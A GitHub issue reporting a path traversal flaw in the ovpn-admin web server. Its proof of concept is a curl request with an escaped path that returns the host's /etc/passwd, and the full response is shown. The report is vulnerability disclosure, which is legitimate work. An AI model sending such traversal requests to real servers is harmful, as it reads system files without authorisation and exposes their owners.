Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

path traversal vulnerability leads to information disclosure #286

Open
bughunter2 opened this issue Sep 4, 2024 · 0 comments
Open

path traversal vulnerability leads to information disclosure #286

bughunter2 opened this issue Sep 4, 2024 · 0 comments

Comments

@bughunter2
Copy link

bughunter2 commented Sep 4, 2024

Example:

The following curl invocation uses a simple path traversal exploit to reveal potentially sensitive information outside of the ovpn-admin web server's intended "web root" directory.

root@node1:~# curl -v http://192.168.123.10:8080/\\/etc/passwd
*   Trying 192.168.123.10:8080...
* Connected to 192.168.123.10 (192.168.123.10) port 8080 (#0)
> GET /\/etc/passwd HTTP/1.1
> Host: 192.168.123.10:8080
> User-Agent: curl/7.88.1
> Accept: */*
> 
< HTTP/1.1 200 OK
< Accept-Ranges: bytes
< Cache-Control: max-age=2592000
< Content-Length: 1222
< Content-Type: text/plain; charset=utf-8
< Last-Modified: Tue, 03 Sep 2024 12:20:58 GMT
< Date: Tue, 03 Sep 2024 12:20:58 GMT
<
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
openvpn:x:100:101:openvpn:/dev/null:/sbin/nologin
* Connection #0 to host 192.168.123.10 left intact

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant